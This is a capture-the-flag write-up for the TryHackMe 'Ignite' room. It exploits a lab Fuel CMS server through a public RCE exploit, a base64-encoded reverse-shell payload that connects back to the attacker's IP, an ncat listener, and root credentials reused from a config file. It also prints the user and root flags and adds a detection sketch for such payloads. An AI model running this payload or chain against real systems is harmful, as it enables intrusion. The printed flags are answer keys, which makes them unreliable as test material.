$ cat ignite-tryhackme-writeup.md

Ignite TryHackMe Writeup

> April 30, 2025 | TryHackMe

Overview

Exploiting Fuel CMS

Target Environment

Role      IP            Interface  OS      Domain      Notes
Attacker  10.17.9.93    tun0       Linux   localhost   Kali/Parrot
Victim    10.10.116.82  -          Ubuntu  ignite.thm

1. Reconnaissance & Initial Enumeration

Port Scanning

Identify open ports on the target:

sudo nmap --min-rate 10000 -p- 10.10.116.82
-> Output: port 80/tcp found open

Service enumeration and version discovery:

sudo nmap -sS -sV -sC -A -T4 10.10.116.82
  PORT   STATE SERVICE VERSION
  80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
  |_http-server-header: Apache/2.4.18 (Ubuntu)
  | http-robots.txt: 1 disallowed entry 
  |_/fuel/
  |_http-title: Welcome to FUEL CMS

2. Web Enumeration


3. Exploitation

Vulnerability: Fuel CMS 1.4 - Remote Code Execution (RCE)

  • Exploit Sourced From:
    searchsploit fuel cms
    

    Chose exploit: /usr/share/exploitdb/exploits/php/webapps/50477.py

  • Exploit Used:
    exploit2.py (see included file for script details).

  • Modification for Reverse Shell:
    The payload in the script was set as:
    cmd = "echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xMC4xNy45LjkzLzQ0NDQgMD4mMQ== | base64 -d | bash"
    

    The command base64-decodes the string and pipes the result to bash, which starts a reverse shell.
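
From the defender's side, the `echo <blob> | base64 -d | bash` staging shown above is easy to spot in process or audit logs. The following detection sketch is an added example, not part of exploit2.py or the original writeup; the function names and the log-line format are assumptions, and the sample lines are constructed around the payload string quoted above.

```python
import base64
import binascii
import re

# Staging pattern: echo <base64 blob> | base64 -d | <shell>
STAGED = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/]{16,}={0,2})['\"]?\s*\|\s*base64\s+(?:-d|--decode)"
    r"\s*\|\s*(?:ba|da|z)?sh\b"
)
# Indicators in the decoded text that point to an interactive network shell
INDICATORS = {
    "dev_tcp_redirect": re.compile(r"/dev/(?:tcp|udp)/(\d{1,3}(?:\.\d{1,3}){3})/(\d{1,5})"),
    "interactive_shell": re.compile(r"\b(?:ba|da|z)?sh\s+-i\b"),
}

def inspect_command(cmdline):
    """Return a finding dict if cmdline pipes a base64 blob into a shell, else None."""
    m = STAGED.search(cmdline)
    if not m:
        return None
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return {"decoded": None, "hits": ["undecodable_blob"], "peer": None}
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    peer = INDICATORS["dev_tcp_redirect"].search(decoded)
    return {
        "decoded": decoded,
        "hits": hits,
        "peer": (peer.group(1), int(peer.group(2))) if peer else None,
    }

def scan(lines):
    """Return (line, finding) pairs for every command line that matches."""
    return [(line, f) for line in lines if (f := inspect_command(line))]

# Constructed sample: command lines as a web server's process audit log might record
# them (format is an assumption). The second entry is the payload from this writeup.
SAMPLE = [
    "sh -c ls -la /var/www/html",
    "sh -c echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xMC4xNy45LjkzLzQ0NDQgMD4mMQ== | base64 -d | bash",
    "sh -c echo aGVsbG8gd29ybGQ= | base64 -d",
]

if __name__ == "__main__":
    for line, finding in scan(SAMPLE):
        print(finding["hits"], finding["peer"], "<-", line)
```

Only the second sample line is flagged; a plain `base64 -d` with no shell on the receiving end of the pipe is left alone.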

Command Execution

  • Run exploit:
    python3 exploit2.py -u http://10.10.116.82
    
  • Set up listener on attacker machine:
    rlwrap ncat -nvlp 4444
    
  • Stabilize the shell:
    • After connection, press Ctrl+Z to background the shell.
    • Enter:
      stty raw -echo && fg
      python3 -c 'import pty;pty.spawn("/bin/bash")'
      

4. Post-Exploitation

User Flag

  • Location: /home/www-data/flag.txt
  • Command:
    cat /home/www-data/flag.txt
    
  • Flag:
    6470e394cbf6dab6a91682cc8585059b
    

5. Privilege Escalation

  • Discovered Credentials:
    • File: fuel/application/config/database.php
    • Extracted root credentials from the Fuel CMS config.
  • Switch to root:
    su root
    
  • Root Flag Location: /root/root.txt
    cat /root/root.txt
    
  • Flag:
    b9bbcb33e11b80be759c4e844862482d
    

6. Summary

  • Initial Foothold: Default Fuel CMS credentials (admin:admin).
  • Remote Code Execution: Via public exploit (CVE-2018-16763).
  • Shell Stabilization: PTY and terminal handling for interactive shell.
  • Privilege Escalation: Re-use of CMS credentials for root access.
  • Flags Captured: User and root.

Appendix

Exploit Code Used

See exploit2.py for the actual exploit script.